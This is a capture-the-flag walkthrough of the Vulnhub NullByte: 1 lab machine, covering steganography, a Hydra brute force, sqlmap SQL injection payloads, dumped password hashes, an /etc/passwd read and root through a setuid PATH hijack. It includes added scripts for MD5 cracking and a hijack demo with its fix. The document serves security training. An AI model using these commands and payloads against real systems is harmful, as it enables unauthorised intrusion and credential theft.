[Vulnhub]NullByte: 1

NullByte challenge 0x01

Difficulty: basic to intermediate.

“Use your lateral thinking skills, maybe you’ll need to write some code.” – ly0n

For more information and the OVA download, check here.

Attacker & Target

Attacker: Kali Linux (on the same 10.1.1.0/24 network as the target)

Target: NullByte: 1 (10.1.1.134)

Vulnerability & Exploit

  • Hidden information in the index picture reveals a hidden web path
  • Weak password on the hidden web login form, recoverable by dictionary attack
  • SQL injection vulnerability in the username search page
  • Exploiting the SQL injection yields database credentials, arbitrary file reads and a limited shell
  • User ramses has a Base64-encoded, unsalted MD5 password that cracks easily and works for SSH
  • A misconfigured setuid-root program calls ps through system() without a full path; hijacking $PATH gives ROOT

Method

  • Scanned the network to discover the target server [netdiscover]
  • Port scanned the target to discover open ports and running services [unicornscan & nmap]
  • Web application vulnerability scan to discover any web vulnerability [nikto]
  • Brute force scan to find hidden paths [dirb]
  • Web information gathering and interaction with the web server [Firefox/Iceweasel]
  • Downloaded the picture from index.html and revealed the hidden information stored in it [strings]
  • Found the hidden folder and a login page whose HTML comment says the password is simple
  • Used hydra with rockyou.txt to brute force the login password [THC Hydra]
  • The username search page behind the login is SQL-injectable; exploited it to download sensitive system files and login credentials, and to get a limited shell [sqlmap]
  • Cracked user ramses's password and logged in over SSH to get a proper shell
  • System enumeration, then exploited a vulnerable program with the setuid bit set to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using netdiscover as usual to detect the target's IP address (10.1.1.134 in this case):

F4l13n@kali:~$ sudo netdiscover -r 10.1.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                  
                                                                                                                                                                
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 10.1.1.1        00:50:56:c0:00:08    01    060   VMWare, Inc.                                                                                                  
 10.1.1.2        00:50:56:fd:d1:6b    01    060   VMWare, Inc.                                                                                                  
 10.1.1.134      00:0c:29:e1:e0:98    01    060   VMware, Inc.                                                                                              
 10.1.1.254      00:50:56:ee:31:18    01    060   VMWare, Inc.

10.1.1.134 is our target!

Then I run unicornscan to find open ports. unicornscan is much faster than nmap for a full 65535-port sweep, so I use it for the sweep and then point nmap only at the ports it finds for the deeper service and OS scan.

F4l13n@kali:~$ sudo us -H -msf -Iv -p 1-65535 10.1.1.134
listener statistics 147984 packets recieved 0 packets droped and 0 interface drops
TCP open              http[   80]     from 10.1.1.134  ttl 64 
TCP open            sunrpc[  111]     from 10.1.1.134  ttl 64 
TCP open    multiling-http[  777]     from 10.1.1.134  ttl 64 
TCP open           unknown[32942]     from 10.1.1.134  ttl 64

From the result above, TCP ports 80, 111, 777 and 32942 are open.

Then I run an nmap service/OS scan to get more detail on the four open ports.

# Nmap 6.49BETA4 scan initiated Mon Aug 17 07:06:13 2015 as: nmap -v -sV -O -A -T4 -p 80,111,777,32942 -oN NullByte_nmap.txt 10.1.1.134
Nmap scan report for 10.1.1.134
Host is up (0.00044s latency).
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          32942/tcp  status
|_  100024  1          47213/udp  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_  256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
32942/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:E1:E0:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.029 days (since Mon Aug 17 06:25:06 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 10.1.1.134

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 17 07:06:29 2015 -- 1 IP address (1 host up) scanned in 16.18 seconds

Port 777 is running OpenSSH 6.7p1 (SSH on a non-standard port), Apache 2.4.10 is on port 80, and ports 111 and 32942 are just rpcbind and its status service. The host is Debian with a 3.x kernel.

Then I run nikto to see whether any known web vulnerability turns up, which would be a life saver.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.134
+ Target Hostname:    10.1.1.134
+ Target Port:        80
+ Start Time:         2015-08-17 07:01:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xc4 0x51c42a5c32a70 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7668 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2015-08-17 07:02:17 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing too exciting, but phpMyAdmin is installed under /phpmyadmin/.

Secret in the Pic

I tried the default and a few weak passwords against the phpMyAdmin login, but they all failed.

Then I opened Iceweasel to have a closer look at the website. There is only a picture and the sentence "If you search for the laws of harmony, you will find knowledge."

Nothing in the sentence itself, but a hint is hidden in the picture. Running strings over the downloaded main.gif:

F4l13n@kali:~/vulnhub/NullByte$ strings main.gif 
GIF89a
P-): kzMb5nVYJw
cccIII@@@GGG444999```<<<
ooo>>>EEE
???^^^
HHH;;;
gggRRRJJJ+++
TTTZZZ
QQQ///
~~~'''CCC
   AAA
aaa222
... ...

Pay attention to the line right after the GIF89a header, a readable string embedded in the image:

P-): kzMb5nVYJw

The same trick works without strings: any hex editor shows it near the start of the file. I tried 'kzMb5nVYJw' as a hidden folder, and http://10.1.1.134/kzMb5nVYJw/ turned out to be a login page.

From the page source I noticed a comment saying that this form is not connected to MySQL and that the password is not complex. So there is no SQL injection to find here; an online dictionary attack against the form is the way in.

I use Hydra's http-post-form module with the rockyou.txt dictionary against the form and get the password: elite. The module needs a login value, so -l admin is only a placeholder; the form has a single field, key, and ^PASS^ is the only thing that varies. The last part of the module string, "invalid", is the text the page returns for a wrong key, which Hydra uses to tell failures from the one success.

F4l13n@kali:~/vulnhub/NullByte$ sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.1.1.134 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid"
[sudo] password for F4l13n: 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-17 09:20:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 10.1.1.134   login: admin   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-17 09:20:57

After logging in with the password elite, I was forwarded to a username search page.

After trying several common SQLi tests, I found that the usrtosearch parameter is injectable; the injection point is http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=admin

Then I let sqlmap do the rest of the work. The trailing * marks the injection point explicitly; sqlmap confirms boolean-based blind, time-based blind and UNION-based injection (the UNION payload with three NULL columns is the fast path for data extraction):

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --dbs
... ...
[09:45:30] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 151 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=-8162" OR 3808=3808#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" AND (SELECT * FROM (SELECT(SLEEP(5)))hjFz)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" UNION ALL SELECT NULL,NULL,CONCAT(0x7170706271,0x6845736a5777725a736a,0x71706b7a71)#
---
[09:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[09:45:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth

[09:45:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 09:45:33

Dumping the mysql.user table to grab the password hashes. sqlmap recognises the MySQL hash format and runs its built-in dictionary attack on them; the cracked plaintext appears in parentheses:

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -C User,Password,Host,Super_priv -T user -D mysql

... ...
Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------------------+-----------+------------+
| User             | Password                                              | Host      | Super_priv |
+------------------+-------------------------------------------------------+-----------+------------+
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | nullbyte  | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | 127.0.0.1 | Y          |
| root             | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | ::1       | Y          |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC             | localhost | Y          |
| phpmyadmin       | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | N          |
+------------------+-------------------------------------------------------+-----------+------------+

[09:56:13] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/mysql/user-f3649c95.csv'
[09:56:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 09:56:13

Found the MySQL root login (also valid for phpMyAdmin): root / sunnyvale. Note that root is allowed from several hosts and the phpmyadmin account reuses the same password.

Be ramses!

There is another users table in the seth database, which includes the password hash of user ramses:

kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -T users -D seth
... ...
[10:12:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[10:12:15] [INFO] fetching columns 'position, user, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+--------+------------+---------------------------------------------+
| id | user   | position   | pass                                        |
+----+--------+------------+---------------------------------------------+
| 1  | ramses | <blank>    | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2  | isis   | employee   | --not allowed--                             |
+----+--------+------------+---------------------------------------------+

[10:12:15] [INFO] table 'seth.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/seth/users.csv'
[10:12:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'

[*] shutting down at 10:12:15

Found a credential for user ramses: ramses / YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

The stored value is Base64-encoded (not encrypted); decoding it gives an MD5 hash: c6d6bd7ebf806f43c76acc3681703b81

F4l13n@kali:~$ echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

The "invalid input" error is only base64 complaining that the 43-character value is missing its trailing "=" padding; the 32 hex characters printed before it are the complete digest. The hash is plain unsalted MD5, so any lookup table or wordlist attack cracks it in seconds; the plaintext is omega.
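The helper below is an added example, not part of the original walkthrough. It restores the Base64 padding so the decode is clean, recovers the MD5 digest, and then checks candidate plaintexts against it offline (the same job the online cracker did above). It assumes GNU coreutils (base64, md5sum) and uses a constructed four-word wordlist for the demo at the bottom.

```shell
#!/bin/sh
# Added example, not from the original write-up. Assumes GNU coreutils
# (base64, md5sum, cut, tr). The wordlist used in the demo is constructed.

# The value dumped from seth.users is 43 characters: Base64 without its '='
# padding. `base64 -d` prints the bytes it can decode and then reports
# "invalid input". Restoring the padding (length a multiple of 4) fixes that.
pad_b64() {
    s=$1
    while [ $(( ${#s} % 4 )) -ne 0 ]; do
        s="$s="
    done
    printf '%s' "$s"
}

decode_b64() {
    pad_b64 "$1" | base64 -d
}

# Unsalted MD5 of a string. printf, not echo: `echo omega | md5sum` would hash
# "omega\n" and never match the stored digest.
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# True when the candidate's MD5 equals the digest (hex compared case-insensitively).
md5_matches() {
    [ "$(md5_hex "$1")" = "$(printf '%s' "$2" | tr 'A-F' 'a-f')" ]
}

# Minimal wordlist attack: prints the first word whose MD5 is the digest,
# exit status 1 if the list is exhausted.
crack_md5() {
    digest=$1
    wordlist=$2
    while IFS= read -r word || [ -n "$word" ]; do
        if md5_matches "$word" "$digest"; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Stand-alone demo: recover the digest from the dumped value, then crack it
# against a small constructed wordlist.
stored='YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE'
digest_hex=$(decode_b64 "$stored")
echo "MD5 digest: $digest_hex"
wl=$(mktemp)
printf 'alpha\nbeta\nomega\nramses\n' > "$wl"
crack_md5 "$digest_hex" "$wl" && echo "cracked via wordlist" || echo "no match in wordlist"
rm -f "$wl"
```

For a real engagement you would point crack_md5 (or rather hashcat/john, which are orders of magnitude faster) at rockyou.txt; the point here is that an unsalted MD5 of a dictionary word offers no protection once the database can be read.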

Before trying the password anywhere, I used the same injection point to read /etc/passwd (sqlmap's --file-read option) to see which local accounts exist and which have a real shell:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash

User ramses (uid 1002, shell /bin/bash) exists in /etc/passwd, alongside bob and eric, so the database password is worth trying against the system.

From the earlier port scan I know SSH listens on port 777, so I try the cracked password ramses / omega over SSH, and bingo:

F4l13n@kali:~/vulnhub/NullByte/sqlmap_rst$ ssh ramses@10.1.1.134 -p 777
ramses@10.1.1.134's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ pwd
/home/ramses
ramses@NullByte:~$

Now I am ramses!

Privilege Escalation

Looking around the system, I found an interesting program, procwatch, with the setuid bit set, in the folder /var/www/backup.

Running the program and looking at its output shows that it executes the ps command, via a system() call. The program does not use the full path of ps, so the shell that system() spawns resolves "ps" through the caller's $PATH. Because the binary is setuid root and does not sanitise its environment, an attacker can put a fake ps first in $PATH and have it executed with root's effective uid. This is a classic misconfiguration: a privileged program must call helpers by absolute path and reset PATH (or the whole environment) before running anything.

So I wrote a two-line shell script, saved it as 'ps' in the same directory, and made it executable:

# cat ps
#!/bin/sh
id
/bin/sh

# chmod +x ps

Then prepend the current directory to $PATH so that my ps is found before /bin/ps:

ramses@NullByte:/var/www/backup$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Then run procwatch; it calls ps, which is now my script, and the script's /bin/sh inherits euid 0:

ramses@NullByte:/var/www/backup$ ./procwatch 
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 1170 Aug  2 01:45 proof.txt
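The following is an added example, not part of the original walkthrough and not the real procwatch binary. It reproduces just the PATH-resolution bug with three throwaway scripts: a stand-in that runs ps by bare name (the procwatch mistake), the attacker's fake ps, and a fixed stand-in that resets PATH and calls the tool by absolute path. It also includes the $PATH check and the setuid enumeration command a pentester runs before looking for this class of bug. The setuid bit is deliberately not reproduced, so the demo is safe to run as any user; the names procwatch_vuln and procwatch_fixed are made up.

```shell
#!/bin/sh
# Added example, not from the original write-up and not the real procwatch.
# Only the PATH-resolution flaw is reproduced; no setuid bit is involved.
# procwatch_vuln / procwatch_fixed are names invented for this demo.

# Check 1: is a PATH value exploitable? Exit 0 (true) when any component is
# empty (an empty entry means "current directory") or relative, such as the
# "." that `export PATH=.:$PATH` prepends.
path_is_hijackable() {
    p=$1
    case ":$p:" in *::*) return 0 ;; esac
    while [ -n "$p" ]; do
        comp=${p%%:*}
        case $comp in
            /*) ;;
            *) return 0 ;;
        esac
        case $p in
            *:*) p=${p#*:} ;;
            *) p= ;;
        esac
    done
    return 1
}

# Check 2: the enumeration step that finds programs like procwatch. Slow on a
# real host, so the demo below does not call it.
list_suid_root() {
    find / -user root -perm -4000 -type f 2>/dev/null
}

# Build a scratch directory holding the fake ps and both stand-ins; prints its path.
setup_demo() {
    dir=$(mktemp -d)
    # Attacker's fake ps. On the box it ran `id; /bin/sh`; here it only announces itself.
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/ps"
    # Vulnerable stand-in: ps by bare name, resolved through the inherited PATH.
    # system("ps") in a C program behaves the same, it runs /bin/sh -c "ps".
    printf '#!/bin/sh\nps\n' > "$dir/procwatch_vuln"
    # Fixed stand-in: reset PATH to trusted directories before running anything,
    # and call the helper by absolute path. Either change alone defeats the attack.
    printf '#!/bin/sh\nPATH=/usr/sbin:/usr/bin:/sbin:/bin; export PATH\n' > "$dir/procwatch_fixed"
    printf 'if [ -x /bin/ps ]; then /bin/ps >/dev/null 2>&1; echo REAL_PS; else echo NO_PS_INSTALLED; fi\n' >> "$dir/procwatch_fixed"
    chmod 755 "$dir/ps" "$dir/procwatch_vuln" "$dir/procwatch_fixed"
    printf '%s\n' "$dir"
}

# Run one stand-in from inside the scratch directory with "." first in PATH,
# the same environment ramses set up before running ./procwatch.
run_with_dot_path() {
    ( cd "$1" && PATH=".:$PATH" "./$2" 2>/dev/null ) || true
}

# Stand-alone demo.
if path_is_hijackable ".:$PATH"; then echo "PATH with '.' prepended is hijackable"; fi
d=$(setup_demo)
echo "vulnerable stand-in printed: $(run_with_dot_path "$d" procwatch_vuln)"
echo "fixed stand-in printed:      $(run_with_dot_path "$d" procwatch_fixed)"
rm -rf "$d"
```

In a real setuid binary the fix is the same idea in C: execve() the helper by absolute path with a fixed environment instead of calling system(), and drop privileges before spawning anything that does not need them.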

Note that uid is still 1002 while euid is 0: Debian's /bin/sh keeps the effective uid inherited from the setuid binary, and that is enough to read /root. Catch the flag proof.txt:

# cat proof.txt  
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
... ...
-----END PGP PUBLIC KEY BLOCK-----

Done and cheers Ly0n!

2015-08-18 09:12:46 -0400